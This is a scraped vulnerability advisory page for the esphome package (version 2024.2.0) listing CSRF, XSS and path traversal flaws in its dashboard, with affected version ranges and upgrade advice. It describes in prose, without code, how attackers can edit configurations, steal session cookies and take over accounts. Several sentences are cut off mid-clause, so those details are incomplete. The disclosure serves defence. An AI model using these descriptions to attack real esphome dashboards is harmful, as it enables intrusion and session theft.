esphome@2024.2.0 vulnerabilities
Make creating custom firmwares for ESP32/ESP8266 super easy.
-
latest version
2024.4.2
-
latest non vulnerable version
-
first published
5 years ago
-
latest version published
10 days ago
-
licenses detected
- [0,)
Direct Vulnerabilities
Known vulnerabilities in the esphome package. This does not include vulnerabilities belonging to this package’s dependencies.
Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.Vulnerability | Vulnerable Version |
---|---|
esphome is a Make creating custom firmwares for ESP32/ESP8266 super easy. Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) due to insufficient protection for API endpoints in the dashboard component. An attacker can perform operations on configuration files (create, edit, delete) on behalf of a logged user by directing them to visit a maliciously crafted web page. This effectively bypasses authentication for API calls. The vulnerability can be further exploited in conjunction with another issue to achieve complete account takeover. How to fix Cross-Site Request Forgery (CSRF)? Upgrade |
[2023.12.9,2024.3.0)
|
esphome is a Make creating custom firmwares for ESP32/ESP8266 super easy. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the edit configuration file API in the dashboard component. An attacker can inject arbitrary web script and exfiltrate session cookies by sending a specially crafted POST request to the Note: Cookies are not correctly secured, allowing the exfiltration of session cookie values. How to fix Cross-site Scripting (XSS)? Upgrade |
[2023.12.9,2024.2.2)
|
esphome is a Make creating custom firmwares for ESP32/ESP8266 super easy. Affected versions of this package are vulnerable to Path Traversal due to a security misconfiguration in the Notes:
How to fix Path Traversal? Upgrade |
[,2024.2.1)
|